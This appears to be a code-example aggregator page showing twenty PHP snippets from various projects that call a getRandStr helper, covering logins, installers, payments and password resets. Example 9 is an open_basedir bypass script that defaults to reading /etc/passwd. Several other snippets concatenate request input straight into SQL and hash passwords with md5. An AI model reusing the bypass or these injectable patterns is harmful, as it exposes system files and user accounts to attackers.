Esempio n. 1
0
function tag()
{
    for ($i = 0; $i < 100000; $i++) {
        $tag = new Tag();
        $tag->Name = getRandStr(mt_rand(2, 5));
        $tag->Save();
    }
}
Esempio n. 2
0
 public function setUserLogin($userInfo = array(), $remember = 0, $saveLogin = true)
 {
     if ($saveLogin) {
         $this->update("logincount=logincount+1,loginip='" . ip2long(getUserIp()) . "',logintime='" . TIME . "'", array('id' => $userInfo['id']));
     }
     $saltkey = getRandStr(8);
     $auth = setEnocde($userInfo['id'] . "\t" . $userInfo['psw'], admin::getAuthKey($saltkey));
     myCookie('s_saltkey', $saltkey, $remember);
     myCookie('s_auth', $auth, $remember);
     return true;
 }
Esempio n. 3
0
function getdata_yqm($gs)
{
    $data = str_ireplace('{年}', date("Y"), $gs);
    $data = str_ireplace('{月}', date("m"), $data);
    $data = str_ireplace('{日}', date("d"), $data);
    $data = str_ireplace('{时}', date("H"), $data);
    $data = str_ireplace('{分}', date("i"), $data);
    $data = str_ireplace('{秒}', date("s"), $data);
    preg_match('/{随机\\[([1-9]|1[0-9])\\]}/', $data, $re);
    if (!empty($re[1])) {
        $data = str_ireplace($re[0], getRandStr($re[1]), $data);
    }
    return $data;
}
Esempio n. 4
0
function autoconfig()
{
    exec("echo {$OPENSHIFT_MYSQL_DB_HOST}", $DBHOST);
    exec("echo {$OPENSHIFT_MYSQL_DB_USERNAME}", $DBUSER);
    exec("echo {$OPENSHIFT_MYSQL_DB_PASSWORD}", $DBPW);
    exec("echo {$OPENSHIFT_GEAR_NAME}", $DBNAME);
    $SALT = getRandStr($length = 20);
    $configfile = fopen("../config.php", "w");
    $text = "<?php if (!defined('SYSTEM_ROOT')) { die('Insufficient Permissions'); }\n";
    $text = $text . "define('DB_HOST','" + $DBHOST + "');\n";
    $text = $text . "define('DB_USER','" + $DBUSER + "');\n";
    $text = $text . "define('DB_PASSWD','" + $DBPW + "');\n";
    $text = $text . "define('DB_PASSWD','" + $DBNAME + "');\n";
    $text = $text . "define('DB_PREFIX','tc_');\n";
    $text = $text . "define('SYSTEM_SALT','" + $SALT + "');\n";
    $text = $text . "//This config file was generated by the Tieba-Cloud-Sign-OpenShift-QuickStart. Please edit after you know why and how to edit this file.\n";
    $text = $text . "//本文件由Tieba-Cloud-Sign-OpenShift-QuickStart生成,请在明白为什么/怎么编辑之后进行编辑";
    fwrite($configfile, $text);
}
Esempio n. 5
0
 public function reg()
 {
     if (isset($_POST['nickname'])) {
         $post = $_POST;
         dump($post);
         if ($post['password'] != $post['repassword']) {
             echo "两次密码不一至";
             exit;
         }
         if (DB::fetch_first("select * from %t where email=%s", array('member', $post['email']))) {
             exit('邮箱被占用');
         }
         $post['salt'] = getRandStr();
         $post['createtime'] = TIME;
         $id = DB::insert('member', $post);
         if ($id) {
             $up['password'] = hashpassword($id, $post['password'], $post['salt']);
             DB::update('member', $up, 'id=' . $id);
             $this->redirect('Login/index');
         }
         exit;
     }
     include template();
 }
Esempio n. 6
0
                 echo '<div class="alert alert-danger" role="alert">该版本涉及到数据库更改,无法自动更新,请前往论坛了解详情</div>';
             } else {
                 echo '<div class="alert alert-warning"><form action="ajax.php?mod=admin:update:updnow" method="post"><b>以下文件可以更新</b>:<br/>';
                 echo '<input type="hidden" name="server" value="' . intval($_GET['server']) . '">';
                 echo $d . $t;
                 echo '</div><input type="submit" class="btn btn-primary" value="更新上述文件到最新正式版本"><br/><br/></form>';
             }
         } else {
             echo '<div class="alert alert-success">您当前正在使用最新版本的 ' . SYSTEM_FN . ',无需更新</div>';
         }
     } else {
         echo '<div class="alert alert-info">无法连接到更新服务器,请前往<a href="https://git.oschina.net/kenvix/Tieba-Cloud-Sign">OSCGit</a>自行更新</div>';
     }
     break;
 case 'admin:update:updnow':
     $backup = SYSTEM_ROOT . '/setup/update_backup/' . time() . '-' . getRandStr(7);
     switch (option::get('update_server')) {
         case '2':
             $server = UPDATE_FNAME_GITHUB;
             break;
         case '3':
             $server = UPDATE_FNAME_CODING;
             break;
         case '4':
             $server = UPDATE_FNAME_GITCAFE;
             break;
         default:
             $server = UPDATE_FNAME_OSCGIT;
             break;
     }
     mkdir(SYSTEM_ROOT . '/update_cache', 0777, true);
Esempio n. 7
0
<?php

$mypath = $_SERVER['DOCUMENT_ROOT'] . '/wechat';
//用于直接部署
include_once $mypath . '/includes/magicquotes.inc.php';
include_once $mypath . '/includes/db.inc.php';
include_once $mypath . '/includes/helpers.inc.php';
session_start();
$_SESSION['signInTable'] = 'user_tbl';
if (isset($_POST['nameReady'])) {
    //新用户注册提交
    if ($_POST['nameReady'] == 1 && $_POST['password'] == $_POST['password2']) {
        $token = getRandStr();
        $insertId = pdoInsert($_SESSION['signInTable'], array('name' => $_POST['name'], 'password' => md5($_POST['password']), 'app_id' => $_POST['app_id'], 'app_secret' => $_POST['app_secret'], 'weixin_id' => $_POST['weixin_id'], 'token' => $token));
        $initJson = '{"access_token":"null","expires_in":7200,"gettedTime":0}';
        file_put_contents($GLOBALS['mypath'] . '/tokens/' . $_POST['weixin_id'] . '.token', $initJson);
        $defaultModule = pdoQuery('module_tbl', array('path'), null, ' limit 1');
        $data = $defaultModule->fetch();
        $duty = array($data['path']);
        //        $prejson=array('dutyContent'=>$duty);
        $json = json_encode(array('dutyContent' => $duty));
        $json = addslashes($json);
        $moduleId = pdoInsert('duty_tbl', array('weixin_id' => $_POST['weixin_id'], 'duty' => $json));
        $_SESSION['weixinId'] = $_POST['weixin_id'];
        $_SESSION['login'] = true;
        $_SESSION['userName'] = $_POST['name'];
        header('location: ../admin');
        exit;
    } else {
        include 'signup.html.php';
        exit;
Esempio n. 8
0
<?php

/**
 * Created by PhpStorm.
 * User: master
 * Date: 2016/3/2
 * Time: 20:02
 */
require 'includes/init.php';
require 'includes/lib_user.php';
require 'includes/smtp.php';
require 'lang/' . $_SESSION['lang'] . '/user.php';
$email = trim($_POST['email']);
$token = getRandStr(8);
$password = md5($token);
$sql = "update admin.users set password='******'where email='" . $email . "'";
$GLOBALS['db']->query($sql);
$emailBody = $_LANG['reset'] . ":{$token}<br/>" . $_LANG['modify'] . "!";
$rs = sendMail($email, $_LANG['NewPass'], $emailBody);
if ($rs) {
    echo 1;
} else {
    echo -1;
}
Esempio n. 9
0
<?php

header('content-type: text/plain');
error_reporting(-1);
ini_set('display_errors', TRUE);
printf("open_basedir: %s\nphp_version: %s\n", ini_get('open_basedir'), phpversion());
printf("disable_functions: %s\n", ini_get('disable_functions'));
$file = str_replace('\\', '/', isset($_REQUEST['file']) ? $_REQUEST['file'] : '/etc/passwd');
$relat_file = getRelativePath(__FILE__, $file);
$paths = explode('/', $file);
$name = mt_rand() % 999;
$exp = getRandStr();
mkdir($name);
chdir($name);
for ($i = 1; $i < count($paths) - 1; $i++) {
    mkdir($paths[$i]);
    chdir($paths[$i]);
}
mkdir($paths[$i]);
for ($i -= 1; $i > 0; $i--) {
    chdir('..');
}
$paths = explode('/', $relat_file);
$j = 0;
for ($i = 0; $paths[$i] == '..'; $i++) {
    mkdir($name);
    chdir($name);
    $j++;
}
for ($i = 0; $i <= $j; $i++) {
    chdir('..');
Esempio n. 10
0
 /**
  * 生成token,防御CSRF攻击
  */
 public static function genToken()
 {
     $token_cookie_name = 'EM_TOKENCOOKIE_' . md5(substr(AUTH_KEY, 16, 32) . UID);
     if (isset($_COOKIE[$token_cookie_name])) {
         return $_COOKIE[$token_cookie_name];
     } else {
         $token = md5(getRandStr(16));
         setcookie($token_cookie_name, $token, 0, '/');
         return $token;
     }
 }
Esempio n. 11
0
 * Time: 15:23
 */
header("Content-Type:text/html;charset=utf-8");
error_reporting(E_ERROR | E_WARNING);
$mypath = $_SERVER['DOCUMENT_ROOT'] . '/wechat';
include_once $mypath . '/includes/magicquotes.inc.php';
include_once $mypath . '/includes/db.inc.php';
include_once $mypath . '/includes/helpers.inc.php';
include_once $mypath . '/class/uploader.php';
session_start();
//上传配置
$config = array("savePath" => "../user_img", "maxSize" => 1000, "allowFiles" => array(".gif", ".png", ".jpg", ".jpeg", ".bmp"));
//上传文件目录
//$Path = "upload/";
//背景保存在临时目录中
//$config[ "savePath" ] = $Path;
if (!isset($_SESSION['temp_name'])) {
    $_SESSION['temp_name'] = getRandStr();
}
$up = new uploader($_SESSION['weixinId'], $_SESSION['temp_name'], "upfile", $config);
$type = $_REQUEST['type'];
$callback = $_GET['callback'];
$info = $up->getFileInfo();
/**
 * 返回数据
 */
if ($callback) {
    echo '<script>' . $callback . '(' . json_encode($info) . ')</script>';
} else {
    echo json_encode($info);
}
Esempio n. 12
0
</p>
<p><a href="javascript:history.back(-1);">&laquo;点击返回</a></p>
</div>
</form>
</body>
</html>
EOT;
        exit;
    }
    if (!is_writable('config.php')) {
        emMsg('配置文件(config.php)不可写。如果您使用的是Unix/Linux主机,请修改该文件的权限为777。如果您使用的是Windows主机,请联系管理员,将此文件设为可写');
    }
    if (!is_writable(EMLOG_ROOT . '/content/cache')) {
        emMsg('缓存文件不可写。如果您使用的是Unix/Linux主机,请修改缓存目录 (content/cache) 下所有文件的权限为777。如果您使用的是Windows主机,请联系管理员,将该目录下所有文件设为可写');
    }
    $config = "<?php\n" . "//mysql database address\n" . "define('DB_HOST','{$db_host}');" . "\n//mysql database user\n" . "define('DB_USER','{$db_user}');" . "\n//database password\n" . "define('DB_PASSWD','{$db_pw}');" . "\n//database name\n" . "define('DB_NAME','{$db_name}');" . "\n//database prefix\n" . "define('DB_PREFIX','{$db_prefix}');" . "\n//auth key\n" . "define('AUTH_KEY','" . getRandStr(32) . md5($_SERVER['HTTP_USER_AGENT']) . "');" . "\n//cookie name\n" . "define('AUTH_COOKIE_NAME','EM_AUTHCOOKIE_" . getRandStr(32, false) . "');" . "\n";
    $fp = @fopen('config.php', 'w');
    $fw = @fwrite($fp, $config);
    if (!$fw) {
        emMsg('配置文件(config.php)不可写。如果您使用的是Unix/Linux主机,请修改该文件的权限为777。如果您使用的是Windows主机,请联系管理员,将此文件设为可写');
    }
    fclose($fp);
    //密码加密存储
    $PHPASS = new PasswordHash(8, true);
    $adminpw = $PHPASS->HashPassword($adminpw);
    $dbcharset = 'utf8';
    $type = 'MYISAM';
    $table_charset_sql = $DB->getMysqlVersion() > '4.1' ? 'ENGINE=' . $type . ' DEFAULT CHARSET=' . $dbcharset . ';' : 'ENGINE=' . $type . ';';
    if ($DB->getMysqlVersion() > '4.1') {
        $DB->query("ALTER DATABASE `{$db_name}` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;", true);
    }
Esempio n. 13
0
 public function getVerifyCode()
 {
     $this->check_login();
     $this->check_user();
     $way = filtStr($_POST['way']);
     $target = filtStr($_POST['target']);
     $db = M('shop');
     $where = 'uid=' . $this->user['id'];
     if (!$target || !$way) {
         $data['info'] = '填写信息不全';
         $this->ajaxReturn($data);
     }
     $verifyCode = getRandStr(6);
     $save[$way] = $verifyCode;
     $msg = '您的验证码:' . $verifyCode;
     if ($way == 'mobile') {
         if (!checkIsMobile($target)) {
             $data['info'] = '手机号格式错误';
             $this->ajaxReturn($data);
         }
         if (sendSms($msg, $target, $setting)) {
             $db->where($where)->save($save);
             $data['info'] = '验证码发送成功';
         } else {
             $data['info'] = '验证码发送失败';
         }
     } else {
         if ($way == 'email') {
             if (!checkIsEmail($target)) {
                 $data['info'] = '邮箱格式错误';
                 $this->ajaxReturn($data);
             }
             $send_result = sp_send_email($target, "邮箱认证", $msg);
             if ($send_result['error']) {
                 $data['info'] = '验证码发送失败';
             } else {
                 $data['info'] = '验证码发送成功';
             }
         } else {
             $data['info'] = "非法请求";
         }
     }
     M('shop')->where('uid=' . $this->user['id'])->setField($way, $verifyCode);
     $this->ajaxReturn($data);
 }
Esempio n. 14
0
function getSalt()
{
    if ($salt = session("salt")) {
        return $salt;
    } else {
        $salt = getRandStr(C("SALT_LENGTH"));
        session("salt", $salt);
        return $salt;
    }
}
Esempio n. 15
0
         include 'view/order_inf.html.php';
     } else {
         header('location:controller.php?editAddress=1&from=' . $to);
     }
     exit;
 }
 if (isset($_GET['pay_order'])) {
     $orderId = $_GET['order_id'];
     $orderStu = $_GET['order_stu'];
     include 'view/order_inf.html.php';
     exit;
 }
 if (isset($_GET['preOrderOK'])) {
     if (isset($_SESSION['userKey']['package'])) {
         //            mylog($_SESSION['userKey']['package']);
         $preSign = array('appId' => APP_ID, 'timeStamp' => time(), 'nonceStr' => getRandStr(32), 'package' => $_SESSION['userKey']['package'], 'signType' => 'MD5');
         $sign = makeSign($preSign, KEY);
         $preSign['paySign'] = $sign;
         //            mylog('jsAPiPry:'.toXml($preSign));
         $orderId = (include 'view/wxpay.html.php');
     } else {
         header('location:index.php');
     }
     exit;
 }
 if (isset($_GET['review'])) {
     //        mylog('haha');
     $reviewedQuery = pdoQuery('review_tbl', array('d_id'), array('order_id' => $_GET['order_id']), null);
     foreach ($reviewedQuery as $row) {
         $reviewed[] = $row['d_id'];
     }
Esempio n. 16
0
<?php

include_once '../includePackage.php';
include_once $GLOBALS['mypath'] . '/wechat/interfaceHandler.php';
session_start();
//include 'view/wxpay.html.php';
//mylog('reach');
if (isset($_POST['prePay'])) {
    //    mylog(getArrayInf($_SERVER));
    $query = pdoQuery('order_tbl', null, array('id' => $_POST['order_id'], 'stu' => '0'), ' limit 1');
    if ($inf = $query->fetch()) {
        if (0 == $inf['stu']) {
            $date = array();
            $date['appid'] = APP_ID;
            $date['mch_id'] = MCH_ID;
            $date['nonce_str'] = getRandStr(32);
            $date['body'] = 'gshopPay';
            $date['spbill_create_ip'] = $_SERVER['REMOTE_ADDR'];
            $date['out_trade_no'] = $_POST['order_id'];
            $date['total_fee'] = $inf['total_fee'] * 100;
            $date['notify_url'] = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
            $date['trade_type'] = 'JSAPI';
            $date['openid'] = $inf['c_id'];
            $sign = makeSign($date, KEY);
            $date['sign'] = $sign;
            $xml = toXml($date);
            $handler = new interfaceHandler(WEIXIN_ID);
            $data = $handler->postByCurl('https://api.mch.weixin.qq.com/pay/unifiedorder', $xml);
            //            mylog('prePayInf:' . $data);
            $dataArray = xmlToArray($data);
            $dataJson = json_encode($dataArray, JSON_UNESCAPED_UNICODE);
Esempio n. 17
0
    }
    //进行注册
    $result = register_system($guardian, $_POST['school_code'], $_POST['regCode'], $_POST['password']);
    if ($result["error"] != 0) {
        die($result["msg"]);
    }
    ecs_header("Location: login.php?act=signin&username="******"guardian_phone"] . "&password="******"&status=guardian\n");
    exit;
} elseif ($_REQUEST['act'] == 'forgetPwd') {
    $status = !empty($_REQUEST['status']) ? trim($_REQUEST['status']) : "";
    $phone = !empty($_REQUEST['phone']) ? trim($_REQUEST['phone']) : "";
    if (!$status || !$phone) {
        make_json_error("输入条件错误!");
        exit;
    }
    $password = getRandStr(6);
    //如果是家长
    if ($status == 'guardian') {
        //扫描所有数据库
        $guardian = getGuardianByUsername($phone);
        if ($guardian) {
            $res = forgetPwd_changePwd_guardian($guardian, $guardian["school_code"], $password);
            make_json($res);
            exit;
        } else {
            make_json_error("根据您输入的电话号码" . $phone . "找不到绑定的账户!");
            exit;
        }
    } else {
        if ($status == 'admin') {
            $admin = getAdminByPhone($phone);
Esempio n. 18
0
<?php

if (!defined('SYSTEM_ROOT')) {
    die('Insufficient Permissions');
}
if (isset($_GET['ok'])) {
    echo '<div class="alert alert-success">操作成功</div>';
}
if (isset($_GET['update'])) {
    global $m;
    $result = $m->fetch_array($m->query("select max(id) as id from `" . DB_NAME . "`.`" . DB_PREFIX . "dl_invite`"));
    $row = $result['id'];
    $zg = $row + 1;
    $zg2 = $row + 100;
    for ($i = $zg; $i <= $zg2; $i++) {
        $yqm = getRandStr(18);
        $m->query('INSERT INTO `' . DB_NAME . '`.`' . DB_PREFIX . 'dl_invite` (`id`, `code`) VALUES (\'' . $i . '\', \'' . $yqm . '\');');
    }
    ReDirect(SYSTEM_URL . 'index.php?mod=admin:setplug&plug=dl_invite&ok');
}
if (isset($_GET['delete'])) {
    global $m;
    $m->query("truncate table `" . DB_NAME . "`.`" . DB_PREFIX . "dl_invite`");
    ReDirect(SYSTEM_URL . 'index.php?mod=admin:setplug&plug=dl_invite&ok');
}
?>
<h3>多邀请码设置</h3>
</br></br></br>
<?php 
global $m;
$cont = '';
Esempio n. 19
0
<head>
<meta charset="utf-8">
<title>设置头像</title>
<?php 
include 'sysapp/global_css.php';
?>
<link rel="stylesheet" href="../../img/ui/sys.css">
<script> 
function avatar_success(){
	window.parent.HROS.navbar.getAvatar();
	alert('头像保存成功');
	location.reload();
}
</script>
</head>

<body>
<div style="width:530px;margin:0 auto">
	<embed src="../../libs/avatar_face/face.swf" quality="high" wmode="opaque" FlashVars="defaultImg=<?php 
echo $avatar;
?>
?id=<?php 
echo getRandStr(10);
?>
" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="530" height="480"></embed>
</div>
<?php 
include 'sysapp/global_js.php';
?>
</body>
</html>
Esempio n. 20
0
function callback_init()
{
    option::add(salt, getRandStr(10));
}